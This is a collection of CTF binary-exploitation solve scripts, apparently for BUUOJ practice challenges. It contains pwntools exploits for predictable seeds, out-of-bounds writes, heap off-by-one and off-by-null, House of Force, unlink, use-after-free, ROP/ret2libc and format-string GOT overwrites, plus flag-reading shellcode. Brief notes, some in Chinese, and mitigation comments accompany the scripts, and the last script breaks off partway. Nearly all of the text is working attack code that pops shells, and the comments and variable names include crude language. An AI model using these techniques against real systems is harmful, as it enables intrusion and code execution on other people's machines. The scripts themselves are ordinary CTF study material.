覆盖随机数种子
int main(int argc, char const *argv[])
{
    /* Reproduce the target's dice rolls: it seeds with srand(0), so rand() is
     * fully predictable and the 50 values can be printed ahead of time. */
    enum { ROLLS = 50, SIDES = 6 };
    int n = 0;
    (void)argc;
    (void)argv;
    srand(0);
    while (n++ < ROLLS)
        printf("%d,", rand() % SIDES + 1);
    return 0;
}
from pwn import *
context.log_level='debug'
r = remote("node3.buuoj.cn", 29826)
# The 50 values below are rand()%6+1 after srand(0) (see the C snippet above):
# once the seed is known the "random" game is a replay.
nmsl = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
r.recvuntil(" let me know your name: ")
# The name fills its 0x40-byte buffer and a zero qword is written just past it,
# presumably over the adjacent seed variable (the note at the top of the page
# says the seed is overwritten). Mitigation: bounded name read, seed from
# getrandom()/urandom rather than a value reachable from user input.
r.send("A" * 0x40 + p64(0))
# Replay the precomputed sequence, one guess per round.
for i in nmsl:
r.recvuntil("Give me the point(1~6): ")
r.sendline(str(i))
r.interactive()
from pwn import *
# Target of the out-of-bounds array write below; the fixed 0x0804… value
# written there suggests a non-PIE 32-bit binary.
r = remote('node3.buuoj.cn',27835)
context.log_level = 'debug'
def change(offset, num):
    """Menu option 3: store `num` into array slot `offset`.

    The call sites below use offsets 0x84..0x87 against a one-element array,
    so the index is evidently not bounds-checked (out-of-bounds write).
    """
    r.sendline('3')
    for prompt, reply in (("which number to change:", str(offset)),
                          ('new number:', str(num))):
        r.recvuntil(prompt)
        r.sendline(reply)
# Declare a one-element array, then write four bytes one slot at a time at
# offsets 0x84..0x87 — far outside the array — assembling the little-endian
# value 0x0804859b (presumably a saved return address or function pointer;
# confirm in the binary). Option 5 then triggers the hijacked control flow.
# Mitigation: validate the slot index against the declared element count.
r.recvuntil("How many numbers you have:")
r.sendline('1')
r.recvuntil("Give me your numbers")
r.sendline('1')
change(0x84, 0x9b)
change(0x85, 0x85)
change(0x86, 0x04)
change(0x87, 0x08)
r.sendline('5')
r.interactive()
off by null
伪造堆块,off by null改size,free引发堆块合并再拿回来,得到unsorted bin
堆块重叠控制fd,打free_hook
from pwn import *
#context.log_level = 'debug'
#r = remote('node3.buuoj.cn',25567)
# Local run; the libc path must be the glibc the offsets below were derived
# from (0x3ebca0 main_arena offset, __free_hook: libc 2.27).
r = process('./QCTF_2018_babyheap')
elf = ELF ('./QCTF_2018_babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
def create(size,data):
    """Menu option 1: allocate `size` bytes and fill them with `data`."""
    r.sendlineafter('Your choice :', '1')
    r.sendlineafter('Size:', str(size))
    r.sendlineafter('Data:', data)
def delete(index):
    """Menu option 2: free the chunk stored at `index`."""
    r.sendlineafter('Your choice :', '2')
    r.sendlineafter('Index', str(index))
def show():
    """Menu option 3: dump the live chunks (used below to read a leaked pointer)."""
    r.sendlineafter('Your choice :', '3')
# Layout for the off-by-null described in the note above: chunk 1 carries a
# forged 0x600 size field at offset 0x5f0 so a later consolidation swallows
# its neighbour.
create(0xf8,'')
create(0x648,'a'*0x5f0+p64(0x600))
create(0x500,'')
create(0x100,'')
delete(0)
delete(1)
# 0xf8 bytes plus the terminating NUL clear the prev_inuse bit of the next
# chunk's size field — the off-by-null write.
create(0xf8,'b'*0xf8)
create(0x4f8,'')
create(0xf8,'')
delete(1)
delete(2)
create(0x4f8,'')
show()
r.recvuntil('4 : ')
# Chunk 4 now overlaps a freed unsorted-bin chunk whose fd points into
# main_arena; 0x3ebca0 is that arena offset in libc 2.27.
libc_base = u64(r.recv(6)+'\x00'*2)-0x3ebca0
log.success(hex(libc_base))
create(0xf8,'')
delete(4)
delete(2)
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
# The overlapped freed chunk's next pointer (presumably tcache on 2.27) is
# replaced with __free_hook so that two allocations later the hook itself is
# returned; free() on the "/bin/sh" chunk then calls system.
# Mitigation: fix the off-by-null; glibc >= 2.32 safe-linking and the removal
# of __free_hook in 2.34 also break this chain.
create(0xf8,p64(free_hook))
create(0xf8,p64(free_hook))
create(0xf8,p64(system))
create(0xf8,'/bin/sh\x00')
delete(6)
r.interactive()
unque去重没有删除元素,只是把重复元素放到数组后面
可以泄露canary和libc_start_main+231
from pwn import *
r = remote('node3.buuoj.cn',25366)
#r = process('./QCTF_2018_babycpp')
elf = ELF('./QCTF_2018_babycpp')
# The offsets used below (__libc_start_main+231, one-gadget 0x4f322) assume
# exactly this libc build.
libc = ELF('/libc-2.27.so')
def change(num):
    """Menu option 1: set the element count to `num` (no prompt is awaited for it)."""
    r.recvuntil('> ')
    for line in ('1', str(num)):
        r.sendline(line)
def get(array):
    """Menu option 2: submit the space-separated element list `array`."""
    r.sendlineafter('> ', '2')
    r.sendlineafter('num:', array)
def unique():
    """Menu option 3: run the dedup pass (per the note above it only moves duplicates to the end)."""
    r.sendlineafter('> ', '3')
def get_data(l,h):
    """Combine two printed 32-bit signed ints into one 64-bit value.

    The target prints array elements as signed ints, so a negative value is
    the two's-complement view of the original word; fold it back into
    0..2**32-1, then place `h` (high word) above `l` (low word).
    """
    def unsigned32(v):
        return v + 0x100000000 if v < 0 else v
    return (unsigned32(h) << 32) + unsigned32(l)
r.recvuntil('input n:')
r.sendline('22')#22*4=88
get('1 '*22)
# Raising the count to 28 after the elements were read lets the print and
# re-read paths run past the 22 real slots into the stack words behind them
# (canary and return-address area, per the note above). Root cause: the resize
# is not bounded by the buffer that was allocated for 22 elements.
change(28)
unique()
r.recvuntil('1 ')
# Each 64-bit stack word is printed as two signed 32-bit halves.
canary_l = int(r.recvuntil(' '))
canary_h = int(r.recvuntil(' '))
canary = get_data(canary_l,canary_h)
log.success(hex(canary))
leak_l = int(r.recvuntil(' '))
leak_h = int(r.recvuntil(' '))
leak = get_data(leak_l,leak_h)
log.success(hex(leak))
leak_l = int(r.recvuntil(' '))
leak_h = int(r.recvuntil(' '))
leak = get_data(leak_l,leak_h)
log.success(hex(leak))
# main's return address is __libc_start_main+231 in this libc build.
libc_base = leak-231-libc.sym['__libc_start_main']
log.success(hex(libc_base))
one = libc_base+0x4f322
# The gadget address is split into halves the target's signed-int parser accepts.
one_l = one%0x100000000
if one_l > 0x7fffffff:
one_l = 0x100000000-one_l
one_h = one>>32
log.info(str(one_l))
log.info(str(one_h))
# Re-send the 22 elements, the canary unchanged, two filler words, then the
# gadget as the return address; option 4 returns from the function.
get('1 '*22+str(canary_l)+' '+str(canary_h)+' '+'1 1 '+str(one_l)+' '+str(one_h))
r.sendline('4')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',29497)
# A length of -1 is accepted (presumably it passes a signed check and becomes
# a huge unsigned read size — confirm in the binary), so the next line
# overruns the 0x18-byte buffer and replaces the saved return address with a
# fixed (non-PIE) code address. Mitigation: reject negative lengths.
r.sendline('-1')
payload = 'a'*0x18 + p64(0x4006e6)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27189)
# Same pattern as the previous script: a negative length followed by a
# 0x18-byte overflow that places a fixed code address over the return slot.
payload = 'a'*0x18 + p64(0x400726)
r.sendline('-1')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28246)
elf = ELF('./bjdctf_2020_babyrop')
libc = ELF('./libc-2.23.so')
vuln = elf.symbols['vuln']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# Fixed gadget address: the binary is not PIE, which is what makes the
# first-stage chain writable without any leak.
pop_rdi_ret = 0x400733
# Stage 1: puts(puts@GOT) to leak a libc address, then return into vuln for a
# second overflow.
payload = 'a'*0x28+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(vuln)
r.recvuntil('story!\n')
r.sendline(payload)
leak = u64(r.recvuntil('\n',drop=True).ljust(8,"\x00"))
libc_base = leak - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search("/bin/sh").next()
# Stage 2: system("/bin/sh"). Mitigation: stack canary + PIE (the 0x28 pad
# would then trip the canary and the gadget address would be unknown).
payload = 'a'*0x28+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
r.recvuntil('story!\n')
r.sendline(payload)
r.interactive()
from pwn import *
# Menu-driven heap target; see the helpers below for the protocol.
r = remote('node3.buuoj.cn',26046)
def add(size,name):
    """Menu option 1: create a record with a `size`-byte name set to `name`."""
    r.sendlineafter('Your choice :', '1')
    r.sendlineafter('Her name size is :', str(size))
    r.sendlineafter('Her name is :', name)
def free(index):
    """Menu option 2: delete the record at `index`."""
    r.sendlineafter('Your choice :', '2')
    r.sendlineafter('Index :', str(index))
def show(index):
    """Menu option 3: print the record at `index`."""
    r.sendlineafter('Your choice :', '3')
    r.sendlineafter('Index :', str(index))
# Use-after-free: two records are freed, then a 0x10-byte allocation reuses
# one of the freed record blocks and fills it with a code address (0x400B9C,
# non-PIE). show(0) then dereferences the stale record pointer — presumably a
# function pointer inside the record. Mitigation: null the table entry on
# free and refuse show() on a deleted index.
add(0x80,'fuck')
add(0x80,'fuck')
free(0)
free(1)
add(0x10,p64(0x400B9C))
show(0)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28026)
# 32-bit variant of the previous target (p32 below); fixed code address.
fuck = 0x8048945
def add(size,content):
    """Menu option 1: create a note of `size` bytes holding `content`."""
    r.sendlineafter('Your choice :', '1')
    r.sendlineafter('Note size :', str(size))
    r.sendlineafter('Content :', content)
def free(index):
    """Menu option 2: delete the note at `index`."""
    r.sendlineafter('Your choice :', '2')
    r.sendlineafter('Index :', str(index))
def show(index):
    """Menu option 3: print the note at `index`."""
    r.sendlineafter('Your choice :', '3')
    r.sendlineafter('Index :', str(index))
# Same use-after-free as above: after freeing two notes, a new 0x60-byte
# allocation lands on a freed note record and overwrites its first word
# (presumably a print function pointer) with `fuck`; show(0) calls it.
add(0x60,'fuck')
add(0x60,'fuck')
free(0)
free(1)
add(0x60,p32(fuck))
show(0)
r.interactive()
off by one
pwndbg> x/64gx 0x17fb000
0x17fb000: 0x0000000000000000 0x0000000000000021//0
0x17fb010: 0x0000000000000018 0x00000000017fb030
0x17fb020: 0x0000000000000000 0x0000000000000021//0
0x17fb030: 0x6161616161616161 0x6161616161616161
0x17fb040: 0x6161616161616161 0x0000000000000041//1
0x17fb050: 0x0000000000000000 0x0000000000000000
0x17fb060: 0x0000000000000000 0x0000000000000021//1
0x17fb070: 0x0000000000000038 0x0000000000602028//content_ptr(puts_got)
0x17fb080: 0x000000000000000a 0x0000000000020f81
from pwn import *
r = remote('node3.buuoj.cn',25620)
#r = process('./heapcreator')
elf = ELF('./heapcreator')
# one-gadget offset 0xf02a4 below is specific to this libc build.
libc = ELF('/libc-2.23.so')
def create(szie,content):
    """Menu option 1: allocate a chunk of `szie` bytes holding `content`."""
    r.sendlineafter('Your choice :', '1')
    r.sendlineafter(':', str(szie))
    r.sendlineafter(':', content)
def edit(index,content):
    """Menu option 2: overwrite the content of chunk `index` (off-by-one per the note above)."""
    r.sendlineafter('Your choice :', '2')
    r.sendlineafter(':', str(index))
    r.sendlineafter(':', content)
def show(index):
    """Menu option 3: print chunk `index`."""
    r.sendlineafter('Your choice :', '3')
    r.sendlineafter(':', str(index))
def free(index):
    """Menu option 4: release chunk `index`."""
    r.sendlineafter('Your choice :', '4')
    r.sendlineafter(':', str(index))
puts_got = elf.got['puts']
create(0x18,'fuck')
create(0x18,'fuck')
# Off-by-one: the edit writes one byte past the 0x18-byte content, turning
# the next chunk's size field into 0x41 (layout in the pwndbg dump above).
edit(0,'a'*0x18+'\x41')
free(1)
# The 0x38 request is served from the enlarged chunk, which now overlaps the
# record {size, content_ptr} of entry 1.
create(0x38,'aaaa')
# Rebuild the overlapped record with content_ptr = puts@GOT.
edit(1,p64(0)*3+p64(0x21)+p64(0x38)+p64(puts_got))
show(1)
r.recvuntil('Content : ')
leak = r.recvuntil('\n',drop=True)
leak = leak.ljust(8,'\x00')
leak = u64(leak)
log.success(hex(leak))
libc_base = leak - libc.sym['puts']
log.success(hex(libc_base))
one = libc_base + 0xf02a4
# Writing through the same record replaces puts@GOT with the gadget.
# Mitigation: fix the off-by-one; full RELRO makes the GOT read-only.
edit(1,p64(one))
r.interactive()
house of force
有个放着hello_message和goodbye_message函数的白给chunk,把goodbye_message改成magic,exit拿flag
edit size没验,可以溢出改top chunk size,把指针抬到白给chunk
from pwn import *
r = remote('node3.buuoj.cn',28044)
#r = process('./bamboobox')
elf = ELF('./bamboobox')
# Address of the win function named in the note above (non-PIE binary).
magic = 0x400d49
def show():
    """Menu option 1: list the items."""
    r.recvuntil('Your choice:')
    r.sendline('1')
def add(size,name):
    """Menu option 2: add an item with a `size`-byte name `name`."""
    for prompt, reply in (('Your choice:', '2'), ('name:', str(size)), ('item:', name)):
        r.recvuntil(prompt)
        r.sendline(reply)
def edit(index,size,name):
    """Menu option 3: rewrite item `index` with `size` bytes of `name`.

    `size` is taken from the caller and (per the note above) not checked
    against the item's allocation; `name` is sent raw, without a newline.
    """
    for prompt, reply in (('Your choice:', '3'), ('item:', str(index)), ('name:', str(size))):
        r.recvuntil(prompt)
        r.sendline(reply)
    r.recvuntil('item:')
    r.send(name)
def free(index):
    """Menu option 4: remove item `index`."""
    for prompt, reply in (('Your choice:', '4'), ('item:', str(index))):
        r.recvuntil(prompt)
        r.sendline(reply)
# House of Force (note above): edit() accepts a larger size than the item was
# allocated with, so the write runs past chunk 0 and sets the top-chunk size
# to 0xff…ff. A negative request then moves the top pointer back to the chunk
# holding the two function pointers, and the final add() overwrites both with
# `magic`. Mitigation: bound edit() by the recorded size; glibc >= 2.29 also
# rejects an implausibly large top chunk.
add(0x60,'fuck')
edit(0,0x70,'a'*0x60+p64(0)+'\xff'*8)
add(-0x70-0x20-0x10,'aaaa')
add(0x20,p64(magic)*2)
r.interactive()
但是靶🐓里没有/home/bamboobox/flag,👴得getshell
unlink打0x6020C8
from pwn import *
r = remote('node3.buuoj.cn',27947)
#r = process('./bamboobox')
elf = ELF('./bamboobox')
# Unlink variant of the previous script (note above): aims at the item table
# at 0x6020C8 instead of the win function.
libc = ELF('/libc-2.23.so')
def show():
    """Menu option 1: list the items (used below to read a leaked GOT value)."""
    r.recvuntil('Your choice:')
    r.sendline('1')
def add(size,name):
    """Menu option 2: add an item with a `size`-byte name `name`."""
    for prompt, reply in (('Your choice:', '2'), ('name:', str(size)), ('item:', name)):
        r.recvuntil(prompt)
        r.sendline(reply)
def edit(index,size,name):
    """Menu option 3: rewrite item `index` with `size` bytes of `name` (size unchecked per the note above)."""
    for prompt, reply in (('Your choice:', '3'), ('item:', str(index)), ('name:', str(size))):
        r.recvuntil(prompt)
        r.sendline(reply)
    r.recvuntil('item:')
    r.send(name)
def free(index):
    """Menu option 4: remove item `index`."""
    for prompt, reply in (('Your choice:', '4'), ('item:', str(index))):
        r.recvuntil(prompt)
        r.sendline(reply)
add(0x60, 'fuck')
add(0x80, 'fuck')
add(0x60, 'fuck')
# Item-table slot for chunk 0; fd/bk of the fake chunk point 0x18/0x10 below
# it so the unlink() consistency check (FD->bk == P == BK->fd) passes.
ptr = 0x6020C8
fake_chunk = p64(0)#prev_size
fake_chunk += p64(0x61)#size
fake_chunk += p64(ptr - 0x18)#fd
fake_chunk += p64(ptr - 0x10)#bk
fake_chunk += p64(0)*8#padding
fake_chunk += p64(0x60)#prev_size
fake_chunk += p64(0x90)#size
# 0x80 bytes into a 0x60 item: the trailing prev_size/size land on chunk 1's
# header (prev_inuse cleared), so free(1) consolidates backwards and unlinks
# the fake chunk — slot 0 now points at the table itself.
edit(0, 0x80, fake_chunk)
free(1)#unlink
# Point slot 0 at atoi@GOT and read it back through show().
payload = p64(0)*2+p64(0x40)+p64(elf.got['atoi'])
edit(0, 0x80, payload)
show()
r.recvuntil('0 : ')
atoi_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc_base = atoi_addr - libc.sym['atoi']
log.success(hex(libc_base))
system = libc_base + libc.sym['system']
# atoi@GOT := system; the next menu read passes the input to it.
# Mitigation: size-checked edit, full RELRO.
edit(0, 0x8, p64(system))
r.recvuntil(':')
r.sendline('/bin/sh\x00')
r.interactive()
unlink打0x602140
from pwn import *
r = remote('node3.buuoj.cn',29409)
#r = process('./stkof')
elf = ELF('./stkof')
# one-gadget offset 0x4526a below is specific to this libc build.
libc = ELF('/libc-2.23.so')
#context.log_level='debug'
def add(size):
    """Menu option 1: allocate `size` bytes, then wait for the 'OK' acknowledgement."""
    for line in ('1', str(size)):
        r.sendline(line)
    r.recvuntil('OK')
def edit(index, size, content):
    """Menu option 2: write `size` bytes of `content` into chunk `index`.

    `content` is sent raw (no newline); the target acknowledges with 'OK'.
    """
    for line in ('2', str(index), str(size)):
        r.sendline(line)
    r.send(content)
    r.recvuntil('OK')
def free(index):
    """Menu option 3: release chunk `index` (no acknowledgement is awaited)."""
    for line in ('3', str(index)):
        r.sendline(line)
add(0x60)
add(0x60)
add(0x80)
add(0x60)
# Pointer-table entry for chunk 2 (table at 0x602140, note above); fd/bk
# point 0x18/0x10 below it to satisfy unlink()'s FD->bk == P check.
ptr = 0x602140+0x10
fake_chunk = p64(0)#prev_size
fake_chunk += p64(0x61)#size
fake_chunk += p64(ptr-0x18)#fd
fake_chunk += p64(ptr-0x10)#bk
fake_chunk += p64(0)*8#padding
fake_chunk += p64(0x60)#prev_size
fake_chunk += p64(0x90)#size
# edit() does not bound the write by the chunk size, so the trailing
# prev_size/size overwrite chunk 3's header; free(3) then unlinks the fake
# chunk and slot 2 ends up pointing into the table itself.
edit(2,len(fake_chunk),fake_chunk)
free(3)#unlink
# Rewrite the table: slot 1 -> free@GOT, slots 2 and 3 -> atoi@GOT.
payload = p64(0)*2+p64(elf.got['free']) + p64(elf.got['atoi']) + p64(elf.got['atoi'])
edit(2,len(payload),payload)
# free@GOT := puts@PLT, so free(2) prints the atoi GOT entry (the leak).
payload = p64(elf.plt['puts'])
edit(1, len(payload), payload)
free(2)
r.recvline()
r.recvline()
leak = u64(r.recv(6).ljust(8,'\x00'))
libc_base = leak-libc.sym['atoi']
log.success(hex(libc_base))
one = libc_base+0x4526a
# atoi@GOT := one-gadget; the next menu read invokes it.
# Mitigation: size-checked edit, full RELRO.
payload = p64(one)
edit(3,len(payload),payload)
r.interactive()
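from pwn import *
# Was `context_arch='amd64'` — a plain variable, not the pwntools setting.
# Harmless only because every asm() call below passes arch= explicitly.
context.arch='amd64'
r = remote('node3.buuoj.cn',26465)
# Stage 1 (0x28 bytes max, note below): open("flag"), read(fd, rsp, 0x28),
# write(1, rsp, 0x28). Avoids execve entirely.
shellcode1 = '''
push 0x67616c66
mov rdi,rsp
push 0
pop rsi
push 0x28
pop rdx
push 2
pop rax
syscall
mov rdi,rax
mov rsi,rsp
push 0
pop rax
syscall
push 1
pop rdi
push 1
pop rax
syscall
'''
shellcode1 = asm(shellcode1,arch='amd64',os='linux')
log.info(hex(len(shellcode1)))
# Stage 2 sits right after the return address: once the `jmp rsp` gadget at
# 0x400a01 lands here it rewinds rsp by 0x30 onto stage 1 and jumps there.
shellcode2 = '''
sub rsp,0x30
jmp rsp
'''
shellcode2 = asm(shellcode2,arch='amd64',os='linux')
log.info(hex(len(shellcode2)))
# Fixed gadget address: non-PIE binary with an executable stack (jmp rsp is
# only useful without NX). Mitigation: NX + PIE + canary.
jmp_rsp = 0x400a01
payload=shellcode1.rjust(0x28,'\x90')+p64(jmp_rsp)+shellcode2
r.sendline(payload)
r.interactive()
#flag{f206f83f-ddae-48de-a6fc-af7d728df04
#flag{f206f83f-ddae-48de-a6fc-af7d728df04f}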
flag读到rsp只能出0x28位,剩下两位出不来,最后一位},还有一位,👴选择爆破平台
// Decompiled (IDA) name handler. `s` (0x40 bytes, ebp-0x5c) is immediately
// followed by `v2` (ebp-0x1c). get_content() may fill all 0x40 bytes with no
// terminating NUL, so strcpy(v2, &s) continues through v2 itself (a heap
// pointer) and print_fuck() echoes it back — the heap-address leak in the note
// below. Mitigation: bounded copy with an explicit terminator.
unsigned int fuck_name()
{
char s; // [esp+1Ch] [ebp-5Ch]
char *v2; // [esp+5Ch] [ebp-1Ch]
unsigned int v3; // [esp+6Ch] [ebp-Ch]
v3 = __readgsdword(0x14u);
memset(&s, 0, 0x50u);
puts("Input your name:");
get_content((int)&s, 0x40, 10); // up to 0x40 bytes: exactly the gap to v2
v2 = (char *)malloc(0x40u);
dword_804B0CC = (int)v2;
strcpy(v2, &s); // unbounded: reads past s when no NUL was stored
print_fuck((int)v2);
return __readgsdword(0x14u) ^ v3;
}
s填满,s和v2中间没\0,strcpy直接全写到v2里,然后打印出来,可以泄露堆地址
// Decompiled org/host handler. `s` (ebp-0x9c) is 0x40 bytes from `v2`
// (ebp-0x5c), which `v3` (ebp-0x58, a 64-byte input) follows. With `s` full
// and unterminated, strcpy(v2, &s) copies s, the v2 pointer and the host input
// into a 0x40-byte heap block — an overflow that reaches the following chunk
// header (the top chunk, per the note below). Same fix as fuck_name().
unsigned int fuck_org_host()
{
char s; // [esp+1Ch] [ebp-9Ch]
char *v2; // [esp+5Ch] [ebp-5Ch]
int v3; // [esp+60h] [ebp-58h]
char *v4; // [esp+A4h] [ebp-14h]
unsigned int v5; // [esp+ACh] [ebp-Ch]
v5 = __readgsdword(0x14u);
memset(&s, 0, 0x90u);
puts("Org:");
get_content((int)&s, 64, 10);
puts("Host:");
get_content((int)&v3, 64, 10);
v4 = (char *)malloc(0x40u);
v2 = (char *)malloc(0x40u); // v2 is the later chunk, adjacent to top
dword_804B0C8 = (int)v2;
dword_804B148 = (int)v4;
strcpy(v4, (const char *)&v3);
strcpy(v2, &s); // unbounded: s + v2 + v3 when s has no NUL
puts("OKay! Enjoy:)");
return __readgsdword(0x14u) ^ v5;
}
s填满,s和v3都进v2,v2连着top chunk,能改top chunk size
把top chunk挪到放堆指针的地方,然后打got表基本操作
from pwn import *
r = remote('node3.buuoj.cn',26911)
#r = process('./bcloud_bctf_2016')
elf = ELF('./bcloud_bctf_2016')
libc = ELF('./libc-2.23.so')
def add(size,content):
    """Menu option 1: create a note of `size` bytes with `content`."""
    for prompt, reply in (('option--->>', '1'), ('note content:', str(size)), ('content:', content)):
        r.recvuntil(prompt)
        r.sendline(reply)
def edit(index,content):
    """Menu option 3: replace the content of note `index`."""
    for prompt, reply in (('option--->>', '3'), ('id:', str(index)), ('content:', content)):
        r.recvuntil(prompt)
        r.sendline(reply)
def free(index):
    """Menu option 4: delete note `index`."""
    for prompt, reply in (('option--->>', '4'), ('id:', str(index))):
        r.recvuntil(prompt)
        r.sendline(reply)
def syn():
    """Menu option 5 (sync); defined for completeness, unused below."""
    r.recvuntil('option--->>')
    r.sendline('5')
atoi_got = elf.got['atoi']
free_got = elf.got['free']
puts_plt = elf.plt['puts']
log.info(hex(free_got))
log.info(hex(atoi_got))
r.recvuntil('Input your name:')
# Fill the 0x40-byte name with no terminator: strcpy in fuck_name() (above)
# copies the adjacent heap pointer into the note and it is echoed back.
r.send('a'*0x40)
r.recvuntil('a'*0x40)
leak_heap = u32(r.recvuntil('!',drop=True))-8
log.success(hex(leak_heap))
r.recvuntil('Org:')
r.send('a'*0x40)
r.recvuntil('Host:')
# Via fuck_org_host() the host bytes end up past the org chunk, on the top
# chunk's size field: 0xffffffff (House of Force setup).
r.sendline(p32(0xffffffff))
fuck_addr = 0x804B0A0
#note:0x804B120
# Negative size moves the top pointer back to the note bookkeeping region.
size = -(leak_heap+3*0x48+0x10-fuck_addr)
add(size,'fuck')
# The next allocation overlays the note-pointer table: 32 size words, then
# pointers to free@GOT, atoi@GOT, atoi@GOT.
add(0x400,p32(8)*32+p32(free_got)+p32(atoi_got)+p32(atoi_got))
# free@GOT := puts@PLT (p64 on a 32-bit target: the low 4 bytes are the
# value, the rest zeros), so free(1) prints atoi's GOT entry.
edit(0,p64(puts_plt))
free(1)
r.recv(1)
atoi_leak = u32(r.recvuntil('\nDelete',drop=True))
libc_base = atoi_leak - libc.sym['atoi']
log.success(hex(libc_base))
system = libc_base + libc.sym['system']
# atoi@GOT := system; the next menu read hands the input to it.
# Mitigation: bounded copies in the two handlers, full RELRO.
edit(2,p32(system))
r.sendline('/bin/sh\x00')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',26394)
elf = ELF('./simplerop')
read_plt = elf.symbols['read']
bss_addr = elf.bss()
# Fixed gadget addresses: the binary is statically linked and non-PIE.
pop_edx_ecx_ebx_ret = 0x0806e850
pop_eax_ret = 0x080bae06
int80 = 0x080493e1
# 32-bit chain: read(0, bss, 8) to stage "/bin/sh", then execve(bss, 0, 0)
# through int 0x80 with eax = 11. Mitigation: canary (0x1c pad), PIE.
payload = 'a'*0x1c+'fuck'+p32(read_plt)+p32(pop_edx_ecx_ebx_ret)+p32(0)+p32(bss_addr)+p32(0x8)
payload += p32(pop_edx_ecx_ebx_ret)+p32(0)+p32(0)+p32(bss_addr)
payload += p32(pop_eax_ret)+p32(11)+p32(int80)
r.sendlineafter(' :', payload)
r.sendline('/bin/sh\x00')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28450)
elf = ELF('./pwnme1')
libc = ELF('./libc-2.23.so')
r.sendline('5')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# 32-bit ret2libc, stage 1: puts(puts@GOT) with 0x80486f4 as the return
# address (presumably back into the menu so a second overflow is possible).
payload = 'a'*0xa8+p32(puts_plt)+p32(0x80486f4)+p32(puts_got)
r.sendline(payload)
r.recvuntil('...\n')
leak = u32(r.recv(4))
libc_base = leak-libc.sym['puts']
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
binsh = libc_base+libc.search('/bin/sh\x00').next()
r.sendline('5')
# Stage 2: system("/bin/sh") with the same frame layout.
payload = 'a'*0xa8+p32(system)+p32(0x80486f4)+p32(binsh)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28998)
elf = ELF('pwnme2')
gets_plt = elf.plt['gets']
string = 0x804A060
fuck_func = 0x80485CB
# 0x70-byte overflow: call gets() into a fixed writable address, then return
# into 0x80485CB, which presumably consumes that string (the second line sent
# is a file path). Mitigation: canary/PIE; never gets().
payload = 'a'*0x70+p32(gets_plt)+p32(fuck_func)+p32(string)
r.sendline(payload)
r.sendline('/flag')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27047)
elf = ELF('./axb_2019_fmt32')
libc = ELF('./libc-2.23.so')
printf_got = elf.got['printf']
r.recvuntil('me:')
# Format-string read: %9$s dereferences the pointer placed after it on the
# stack, i.e. printf@GOT, leaking printf's libc address.
r.sendline("%9$s#" + p32(printf_got))
r.recvuntil('Repeater:')
puts_leak = r.recv(4)
libc_base = u32(puts_leak)-libc.sym['printf']
log.success(hex(libc_base))
one = libc_base + 0x3a80c
# Format-string write: pwntools builds %n writes that store the gadget at
# 0x804A014 (presumably a GOT entry — verify). numbwritten=10 accounts for
# bytes the target prints before the format. Mitigation: constant format
# strings (-Wformat-security), full RELRO.
payload = 'a'+fmtstr_payload(8,{0x804A014:one},numbwritten = 10)
r.recvuntil('me:')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27287)
elf = ELF('./bof')
libc = ELF('./libc-2.23.so')
pop3_ret = 0x08048629
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
print(hex(main))
# 32-bit ret2libc, stage 1: write(1, write@GOT, 4), returning to 0x080484d6
# (presumably the program start, for a second pass). pop3_ret is unused.
payload = 'a'*0x70+p32(write_plt)+p32(0x080484d6)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('XDCTF2015~!\n')
r.sendline(payload)
write_leak = u32(r.recv(4))
libc_base = write_leak-libc.sym['write']
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
binsh = libc_base + libc.search(b'/bin/sh\x00').next()
# Stage 2: system("/bin/sh").
payload = 'a'*0x70+p32(system)+p32(0)+p32(binsh)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27250)
elf = ELF('./axb_2019_fmt64')
libc = ELF('/libc-2.23.so')
sprintf_got = elf.got['sprintf']
# Format-string read: %9$s prints the string at sprintf@GOT, i.e. sprintf's
# libc address; 'fuck' is a delimiter for parsing the reply.
payload = '%9$sfuck'+p64(sprintf_got)
log.info(hex(sprintf_got))
r.recvuntil(':')
r.sendline(payload)
r.recvuntil('Repeater:')
sprintf_leak = u64(r.recvuntil('fuck',drop=True).ljust(8,'\x00'))
libc_base = sprintf_leak-libc.sym['sprintf']
log.success(hex(libc_base))
one = libc_base+0x45216
log.info(hex(one))
# Write the gadget's low 32 bits into sprintf@GOT as two %hn (16-bit) writes;
# the -9 adjusts for bytes already printed before the format.
fuck1 = one & 0xffff
fuck2 = (one >> 16) & 0xffff
payload = ''
payload += '%' + str(fuck1 - 9) + 'c%12$hn'
payload += '%' + str(fuck2-fuck1) + 'c%13$hn'
payload = payload.ljust(0x20,'\x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)
r.recvuntil(':')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',26021)
elf = ELF('./axb_2019_brop64')
libc = ELF('/libc-2.23.so')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x400963
main = 0x4007D6
# 0xd8-byte overflow, stage 1: puts(puts@GOT) then return to main.
payload = 'a'*0xd8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
r.sendline(payload)
puts_leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
